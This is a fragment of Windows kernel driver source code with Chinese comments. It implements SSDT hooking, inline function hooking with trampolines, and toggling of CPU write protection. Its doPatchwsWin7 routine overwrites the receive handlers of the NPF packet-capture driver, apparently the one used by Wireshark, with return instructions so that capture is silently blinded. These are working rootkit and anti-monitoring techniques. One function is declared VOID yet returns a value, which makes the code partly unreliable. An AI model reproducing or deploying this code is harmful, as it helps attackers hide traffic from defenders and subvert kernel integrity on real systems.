NTSTATUS UndoPatchwsWin7()
{
NTSTATUS status = STATUS_SUCCESS;
/*
aa801300 8bff mov edi,edi
aa801302 55 push ebp
aa801303 8bec mov ebp,esp
*/
ULONG uRestoreCode = 0x8b55ff8b;
if (!g_bAlreadyPatchWS)
{
kprintf("have not patched ws yet\n");
return status;
}
if (g_ReceiveNetBufferListsHandler)
{
WPOFF();
*(PULONG)g_ReceiveNetBufferListsHandler =uRestoreCode;
WPON();
}
g_bAlreadyPatchWS = FALSE;
return status;
}
VOID InstallHook (
PHOOK_INFO pHookInfo
)
{
ULONG_PTR ulTrampoline = 0;
unsigned char *pTrampoline = NULL;
#ifdef _WIN64
JMP_ABS JmpABS;
#else
JMP_REL JmpREL;
#endif//_WIN64
ULONG ulReplaceLen = 0;
if (0 == pHookInfo->pOrigFunction ||
0 == pHookInfo->pHookFunction) {
return ulTrampoline;
}
//
//加入反汇编引擎,计算替换指令的字节长度。
//
ulReplaceLen = CalcReplaceSize (pHookInfo->pOrigFunction);
WPOFF();
//
//申请一块内存写入ShellCode.保存原始函数更改字节并跳转至原始函数位置
//
pTrampoline = (unsigned char *)ExAllocatePool(NonPagedPool,TrampolineLen);
RtlFillMemory(pTrampoline, TrampolineLen, 0x90);
ulTrampoline = (ULONG_PTR)pTrampoline;
memcpy((PCHAR)(ulTrampoline), (PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen);
#ifdef _WIN64
JmpABS = MakeAbstractJump (pHookInfo->pOrigFunction + ulReplaceLen);
memcpy(((PCHAR)ulTrampoline + ulReplaceLen), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
JmpREL = MakeRelativeJump (ulTrampoline, pHookInfo->pOrigFunction);
memcpy((PCHAR)(ulTrampoline + ulReplaceLen), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64
//
//处理原始函数地址的内容,JMP到HOOK函数
//
RtlFillMemory((PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen, 0x90);
#ifdef _WIN64
JmpABS = MakeAbstractJump (pHookInfo->pHookFunction);
memcpy((PCHAR)(pHookInfo->pOrigFunction), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
JmpREL = MakeRelativeJump (pHookInfo->pOrigFunction, pHookInfo->pHookFunction);
memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64
WPON();
pHookInfo->ulReplaceLen = ulReplaceLen;
pHookInfo->pTramFunction = (ULONG_PTR)pTrampoline;
}
VOID UnInstallHook (
PHOOK_INFO pHookInfo
)
{
//
//还原替换函数字节
//
WPOFF();
memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(pHookInfo->pTramFunction), pHookInfo->ulReplaceLen);
WPON();
}
// 恢复HOOK
NTSTATUS UnHook(ULONG OldService)
{
if(!g_Init)
{
return STATUS_UNSUCCESSFUL;
}
WPOFF();
// 还原钩子函数
*(PULONG)SERVICE_FUNCTION(OldService) = OldServiceAddressTable[SERVICE_ID(OldService)];
WPON();
return STATUS_SUCCESS;
}
NTSTATUS Hook(ULONG OldService, ULONG NewService)
{
if(!g_Init)
{
DbgPrint(("ServiceTalbe Not Init.\n"));
return STATUS_UNSUCCESSFUL;
}
WPOFF();
DbgPrint("NewService");
//TRACE("New Service\n");
*(PULONG)SERVICE_FUNCTION(OldService) = NewService;
WPON();
return STATUS_SUCCESS;
}
NTSTATUS doPatchwsWin7(char *ProName, DWORD dwLen)
{
NTSTATUS status = STATUS_SUCCESS;
ULONG uPatchRet3 = 0xcc001cc2;
ULONG uPatchRet5 = 0x900014c2;
PDWORD pdwTmp = NULL;
DWORD dwTmp = 0;
if (g_bAlreadyPatchWS)
{
return status;
}
do
{
g_pNpfProtocolBlockWin7 = (PNDIS_PROTOCOL_BLOCKWin7)GetTargetProtocolBlockWin7(ProName, dwLen);
if (g_pNpfProtocolBlockWin7==NULL)
{
status = STATUS_UNSUCCESSFUL;
break;
}
//只搞版本号为5的
g_PatchwsVersion = g_pNpfProtocolBlockWin7->MajorNdisVersion;
if (g_PatchwsVersion<=5)
{
dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
pdwTmp = (PDWORD)(dwTmp+g_ReceiveHandlerOffset);
//Get the old recv
g_NPFReceiveHandler = (ULONG)*pdwTmp;
dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
pdwTmp = (PDWORD)(dwTmp+g_ReceivePacketHandlerOffset);
//Get the old recvpacket
g_NPFReceivePacketHandler = (ULONG)*pdwTmp;
if (g_NPFReceivePacketHandler)
{
WPOFF();
*(PULONG)g_NPFReceivePacketHandler =uPatchRet3;
WPON();
}
else
{
if (g_NPFReceiveHandler==0)
{
kprintf("what??? there is no receive handler for npf??\n");
status = STATUS_UNSUCCESSFUL;
break;
}
WPOFF();
*(PULONG)g_NPFReceiveHandler =uPatchRet3;
WPON();
}
g_bAlreadyPatchWS = TRUE;
break;
}////end for只搞版本号为5的
//ndis 6
if (g_PatchwsVersion==6)
{
dwTmp = (DWORD)g_pNpfProtocolBlockWin7;
pdwTmp = (PDWORD)(dwTmp+g_ReceiveNetBufferListsHandlerOffset);
//Get the old recvlist
g_ReceiveNetBufferListsHandler = *pdwTmp;
if (g_ReceiveNetBufferListsHandler)
{
WPOFF();
*(PULONG)g_ReceiveNetBufferListsHandler =uPatchRet5;
WPON();
}
else
{
status = STATUS_UNSUCCESSFUL;
}
break;
}
} while (0);
return status;
}
